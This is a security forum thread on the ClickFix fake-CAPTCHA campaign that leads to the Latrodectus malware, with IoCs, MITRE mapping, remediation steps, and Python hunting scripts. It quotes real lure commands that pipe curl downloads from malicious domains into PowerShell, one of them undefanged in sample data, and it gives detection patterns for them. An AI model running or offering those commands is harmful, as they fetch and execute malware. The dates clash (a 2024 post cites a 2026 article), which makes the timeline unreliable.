ClickFix in action: how fake captcha can lead to a company-wide infection

Khushal

Thread author
Apr 4, 2024
CERT Polska has just published a new blog article on the topic of ClickFix/fake CAPTCHA campaigns: a step-by-step overview of the infection, malware analysis, IoCs and YARA rules to help secure your own infrastructure.

Good find — CERT Polska’s write-up (published 17 February 2026) is a solid end-to-end case study of how “fake CAPTCHA / ClickFix” social engineering can turn into full code execution and follow-on malware. It’s especially useful because it ties the initial user action to host artifacts, network activity, and provides detection content (IoCs + a YARA rule).

What the article shows (high-level chain)
  • The “fake CAPTCHA” lures the victim into copying a command and running it via Win+R (Run dialog), which effectively hands the attacker interactive code execution.
  • Observed initial commands included patterns like: cmd -> curl … | powershell (i.e., piping remote content into PowerShell).
  • On an infected host they found indicators consistent with DLL side-loading in %APPDATA%\Intel (legit binaries alongside a malicious DLL).
  • They attribute parts of the activity to Latrodectus (loader) and also describe “Supper” payloads (often discussed as pre-ransomware), including persistence via a Scheduled Task.

Practical detection ideas you can apply immediately
  • Hunt for “curl … | powershell” (and similar “download cradle” patterns) in EDR telemetry / Windows Security logs (process creation), and in PowerShell operational logs if enabled.
  • Check for suspicious Scheduled Task creation (the article shows a GoogleUpdateTask name and a very short execution interval as a persistence clue).
  • Host-based IoCs worth hunting (from the case):
    • %APPDATA%\Intel with unusual “Intel-ish” binaries + unexpected DLLs (DLL side-loading pattern)
    • Suspicious DLLs in user profile AppData\Local
  • Network-based hunting:
    • Domains used in the described chain include naintn.com, jzluw.com, gasrobariokley.com, fadoklismokley.com (treat as threat intel; expect churn).
    • C2 IPs discussed for the “Supper” component include 162.19.199.110 (4043), 146.19.49.130 (8080), 185.233.166.27 (443), and 85.239.54.130 (noted as inactive in their analysis).

Hardening / prevention takeaways (defender side)
  • User awareness: any “CAPTCHA” that instructs “Press Win+R, paste, and run” should be treated as malicious by default. This is the core of ClickFix.
  • Reduce “living-off-the-land” abuse:
    • Consider WDAC/AppLocker policies to constrain who can run PowerShell and scripting engines (or limit them to signed/approved scripts where feasible).
    • Enable/centralize PowerShell logging (Script Block Logging, Module Logging) and detailed process command-line logging, then alert on common download-cradle patterns.
  • If you have an IR pipeline: the article’s included YARA (for Supper) is directly usable for targeted scanning, but should be validated in your environment to manage false positives and performance impact.

If someone in a business environment suspects they executed one of these “fake CAPTCHA” commands, treat it as a potential incident (not just adware): isolate the endpoint, preserve logs, and do a scoped hunt for the same command-line / domains across the fleet.
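The hunting ideas above (download cradles in process creation, wtsapi32.dll landing outside the system directories, a GoogleUpdateTask-style task with a very short interval, DNS lookups for the listed domains) as one runnable Python hunt. This is an added example, not code from the thread, CERT Polska or any vendor: the event records are constructed to look like Sysmon (EventID 1, 11, 22) and Windows Security 4698 records, the field names and the five-minute "very short" threshold are assumptions, and the domains are the ones quoted in the post.

```python
"""Hunt constructed Windows telemetry for the ClickFix -> Latrodectus chain
discussed in the thread. Event records below are constructed for the example
(not real logs); field names follow Sysmon / Windows Security conventions."""
import re
from typing import Dict, List, Tuple

# Download cradle: a fetch utility whose output is piped into PowerShell.
CRADLE_RE = re.compile(
    r"\b(curl|wget|iwr|invoke-webrequest|bitsadmin)\b.*\|\s*(powershell|pwsh)\b",
    re.IGNORECASE,
)
# Directories where wtsapi32.dll legitimately lives (compared in lower case).
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Persistence clue from the case: a GoogleUpdateTask-style name with a very short interval.
TASK_NAME_RE = re.compile(r"googleupdatetask", re.IGNORECASE)
ISO_DURATION_RE = re.compile(r"^PT(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?$")
SHORT_INTERVAL_SECONDS = 5 * 60  # assumption: under five minutes counts as "very short"
# Domains from the thread; treat as threat intel and expect churn.
IOC_DOMAINS = {"naintn.com", "jzluw.com", "gasrobariokley.com", "fadoklismokley.com"}


def interval_seconds(iso: str) -> int:
    """Parse an ISO 8601 time-only duration such as PT1M; -1 if not parseable."""
    m = ISO_DURATION_RE.match(iso or "")
    if not m:
        return -1
    hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return hours * 3600 + minutes * 60 + seconds


def check_event(ev: Dict) -> List[str]:
    """Return the names of every rule this single event matches."""
    hits: List[str] = []
    eid = ev.get("EventID")
    if eid == 1:  # Sysmon process creation
        if CRADLE_RE.search(ev.get("CommandLine", "")):
            rule = "download_cradle"
            # A Win+R (Run dialog) launch shows explorer.exe as the parent process,
            # which is exactly the user action the fake CAPTCHA asks for.
            if ev.get("ParentImage", "").lower().endswith("\\explorer.exe"):
                rule += "_from_run_dialog"
            hits.append(rule)
    elif eid == 11:  # Sysmon file create
        path = ev.get("TargetFilename", "").lower()
        if path.endswith("\\wtsapi32.dll") and not path.startswith(SYSTEM_DIRS):
            hits.append("wtsapi32_outside_system_dirs")
    elif eid == 4698:  # Windows Security: a scheduled task was created
        secs = interval_seconds(ev.get("RepetitionInterval", ""))
        if TASK_NAME_RE.search(ev.get("TaskName", "")) or 0 <= secs < SHORT_INTERVAL_SECONDS:
            hits.append("short_interval_or_lookalike_task")
    elif eid == 22:  # Sysmon DNS query
        if ev.get("QueryName", "").lower() in IOC_DOMAINS:
            hits.append("ioc_domain_dns")
    return hits


def hunt(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """(event index, host, rule) for every match across a batch of events."""
    return [(i, ev.get("Computer", "?"), rule)
            for i, ev in enumerate(events) for rule in check_event(ev)]


# Constructed sample batch: four true positives interleaved with benign noise.
SAMPLE_EVENTS = [
    {"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c curl naintn.com/amazoncdn.com/oeiich37874cj30dkk43885j10vj38h38jd/nrs/opn/ca/ | powershell"},
    {"EventID": 1, "Computer": "WS01", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "CommandLine": "powershell -NoProfile Get-Process"},
    {"EventID": 11, "Computer": "WS01",
     "TargetFilename": "C:\\Users\\alice\\AppData\\Roaming\\Intel\\wtsapi32.dll"},
    {"EventID": 11, "Computer": "WS02",
     "TargetFilename": "C:\\Windows\\System32\\wtsapi32.dll"},
    {"EventID": 4698, "Computer": "WS01", "TaskName": "\\GoogleUpdateTask", "RepetitionInterval": "PT1M"},
    {"EventID": 4698, "Computer": "WS02", "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "RepetitionInterval": "P7D"},
    {"EventID": 22, "Computer": "WS01", "QueryName": "gasrobariokley.com"},
    {"EventID": 22, "Computer": "WS02", "QueryName": "www.microsoft.com"},
]

if __name__ == "__main__":
    for idx, host, rule in hunt(SAMPLE_EVENTS):
        print(f"event {idx} on {host}: {rule}")
```

The cradle regex deliberately matches more than the literal "curl … | powershell" seen in this campaign (wget, iwr, Invoke-WebRequest, bitsadmin, pwsh) because the lure text changes between waves while the "fetch, then pipe into a script host" shape does not. Feed it real Sysmon/Security exports by mapping your SIEM's field names onto the keys used here; the explorer.exe parent check is a useful triage hint, not a requirement, since the same command pasted into a terminal will have a different parent.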

Technical Analysis & Remediation

Attack Chain & Delivery

The attack begins with a "Fake CAPTCHA" lure (ClickFix). Users are prompted to copy a code snippet to "verify" their humanity. This snippet is a cmd [/c] command piped to PowerShell, utilizing curl to fetch the next-stage payload.

Observed command:
  cmd [/c] curl naintn[.]com/amazoncdn[.]com/oeiich37874cj30dkk43885j10vj38h38jd/nrs/opn/ca/ | powershell

Variant command:
  cmd [/c] curl jzluw[.]com/cdn-dynmedia-1.microsoft[.]com/is/n03ufh3k003jdhkg99fhhas/is/content/ | powershell

Latrodectus Payload Analysis

Once executed, the malware establishes persistence and C2 communication.
  • Version: the sample identifies itself as version 2.3 in C2 beacon data.
  • Installation: the malware drops files into %APPDATA%\Intel, using a legitimate Intel executable (igfxSDK[.]exe) to sideload the malicious wtsapi32[.]dll.

Evasion
  • Process count check: Latrodectus typically requires at least 75 running processes on Windows 10/11 to execute, aiming to detect sandbox environments.
  • Anti-debug: the binary refuses to run if invoked via rundll.exe or regarding[.]exe. It also performs NTDLL unhooking by manually importing a fresh copy of ntdll[.]dll from disk.
  • Cryptography: strings are decrypted using AES-256 in CTR mode with a fixed key and variable IV.

MITRE ATT&CK Mapping
  • T1204.002 (User Execution): malicious file/command via "Fake CAPTCHA".
  • T1059.001 (Command and Scripting Interpreter): PowerShell execution via cmd [/c].
  • T1574.002 (Hijack Execution Flow): DLL side-loading (wtsapi32[.]dll).
  • T1105 (Ingress Tool Transfer): downloading payload via curl.
  • T1027 (Obfuscated Files or Information): string encryption (AES-CTR).

Telemetry & IOCs

Malicious files (SHA-256)
  • be5bcdfc0dbe204001b071e8270bd6856ce6841c43338d8db914e045147b0e77 (wtsapi32[.]dll - malicious loader)
  • 6673794376681c48ce4981b42e9293eee010d60ef6b100a3866c0abd571ea648 (ClickFix sample)

Legitimate files abused (do not delete without verification)
  • b7f8750851e70ec755343d322d7d81ea0fc1b12d4a1ab6a60e7c8605df4cd6a5 (igfxSDK[.]exe)

Network indicators (C2s & distribution)
  • naintn[.]com (distribution)
  • jzluw[.]com (distribution)
  • gasrobariokley[.]com (Latrodectus C2)
  • fadoklismokley[.]com (Latrodectus C2)

Artifacts
  • Directory: %APPDATA%\Intel containing igfxSDK[.]exe and wtsapi32[.]dll.
  • Suspicious DLLs in user profile: 245282244[.]dll, 760468301[.]dll.

Remediation - THE ENTERPRISE TRACK (NIST CSF 2.0)

DETECT (DE)
  • Query SIEM/EDR for process creation events where cmd[.]exe or powershell[.]exe contains curl and piping (|).
  • Hunt for the creation of wtsapi32.dll outside of System32 or SysWOW64, specifically in %APPDATA% subdirectories.
  • Monitor for network traffic to naintn[.]com, jzluw[.]com, or the specific C2 domains listed above.

RESPOND (RS)
  • Isolate affected hosts immediately. The presence of Latrodectus indicates a precursor to ransomware (often IcedID/Bumblebee lineage).
  • Terminate processes associated with igfxSDK[.]exe running from %APPDATA% locations.
  • Delete the persistence mechanism (likely a Scheduled Task or Registry Run key pointing to the sideloaded executable).

RECOVER (RC)
  • Reimage compromised endpoints. Latrodectus is a sophisticated loader; full remediation usually requires a wipe to ensure no dormant persistence remains.

Remediation - THE HOME USER TRACK (Safety Focus)

Priority 1: Immediate Action
  • If you pasted code into the "Run" box recently, assume compromise. Disconnect from the internet.
  • Check the folder %APPDATA%\Intel (type %APPDATA% in the File Explorer address bar). If you see igfxSDK[.]exe and wtsapi32[.]dll there, delete the entire folder.

Priority 2: Persistence Removal
  • Open Task Manager (Ctrl+Shift+Esc). Look for igfxSDK[.]exe or high CPU usage from unfamiliar processes. Right-click and "End Task".
  • Check "Startup Apps" in Settings. Disable entries that look suspicious or point to the %APPDATA% folders.

Hardening & References
  • Framework: this campaign relies on user execution. Technical controls (EDR) are critical, but User Awareness Training regarding "Paste to Run" attacks is the primary defense.
  • PowerShell: enforce Constrained Language Mode for standard users to limit the efficacy of pasted PowerShell snippets.
  • Baseline: restrict curl[.]exe usage for standard users if not required for business operations.

Data derived from CERT Polska and VMRay analysis reports.

Sources

CERT Polska (Incident Report)

VMRay (Malware Analysis)
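The host-side artifacts in the post above (the igfxSDK.exe + wtsapi32.dll pairing under %APPDATA%, the numeric DLL names in the user profile, the quoted SHA-256 values) as a small offline triage script. Added example, not code from the thread, CERT Polska or VMRay: it builds a throwaway directory tree with placeholder files that merely imitate the AppData layout (so the hash checks will not fire on them, which is the point of keeping the legitimate igfxSDK.exe hash in a separate list), then walks that tree the same way you would walk a real profile.

```python
"""Offline triage of the %APPDATA% side-loading artifacts listed above.
Added example: builds a throwaway directory tree that mimics AppData with
placeholder (constructed) files, then scans it as a real profile would be scanned."""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List

# SHA-256 values quoted in the post. The legitimate igfxSDK.exe hash is kept separate
# because that file on its own is not evidence of compromise.
MALICIOUS_SHA256 = {
    "be5bcdfc0dbe204001b071e8270bd6856ce6841c43338d8db914e045147b0e77": "wtsapi32.dll (malicious loader)",
    "6673794376681c48ce4981b42e9293eee010d60ef6b100a3866c0abd571ea648": "ClickFix sample",
}
ABUSED_LEGIT_SHA256 = {
    "b7f8750851e70ec755343d322d7d81ea0fc1b12d4a1ab6a60e7c8605df4cd6a5": "igfxSDK.exe (legitimate, abused)",
}
SIDELOAD_PAIR = ("igfxsdk.exe", "wtsapi32.dll")            # both present in one non-system folder
SUSPICIOUS_DLL_NAMES = {"245282244.dll", "760468301.dll"}  # numeric DLL names from the post


def sha256_of(path: Path) -> str:
    """Stream a file through SHA-256 so large binaries do not land in memory at once."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            digest.update(chunk)
    return digest.hexdigest()


def triage(appdata: Path) -> Dict[str, List]:
    """Walk an AppData tree; return findings grouped by category."""
    findings: Dict[str, List] = {"sideload_pair": [], "hash_match": [], "suspicious_dll": []}
    for root, _dirs, files in os.walk(appdata):
        names = {f.lower() for f in files}
        # The side-loading pattern: the legitimate host EXE and the hijacked DLL name together.
        if all(n in names for n in SIDELOAD_PAIR):
            findings["sideload_pair"].append(root)
        for name in files:
            full = Path(root) / name
            if name.lower() in SUSPICIOUS_DLL_NAMES:
                findings["suspicious_dll"].append(str(full))
            h = sha256_of(full)
            label = MALICIOUS_SHA256.get(h) or ABUSED_LEGIT_SHA256.get(h)
            if label:
                findings["hash_match"].append((str(full), label))
    return findings


def build_constructed_tree() -> Path:
    """Create a temp dir that imitates <profile>\\AppData with placeholder files (constructed)."""
    base = Path(tempfile.mkdtemp(prefix="appdata_demo_"))
    intel = base / "Roaming" / "Intel"
    intel.mkdir(parents=True)
    (intel / "igfxSDK.exe").write_bytes(b"MZ placeholder - constructed, not the real binary")
    (intel / "wtsapi32.dll").write_bytes(b"MZ placeholder - constructed, not the real DLL")
    local = base / "Local"
    local.mkdir()
    (local / "245282244.dll").write_bytes(b"MZ placeholder - constructed")
    benign = base / "Roaming" / "Microsoft"
    benign.mkdir()
    (benign / "notes.txt").write_bytes(b"abc")
    return base


if __name__ == "__main__":
    # On a real Windows host you would pass Path(os.environ["APPDATA"]).parent instead.
    results = triage(build_constructed_tree())
    for category, items in results.items():
        print(f"{category}: {items}")
```

The sideload check keys on the file pairing rather than on hashes because the loader DLL is rebuilt between campaigns while the abused host executable stays the same; a hash hit is confirmation, a pairing hit in a user-writable folder is the thing worth investigating even when no hash matches.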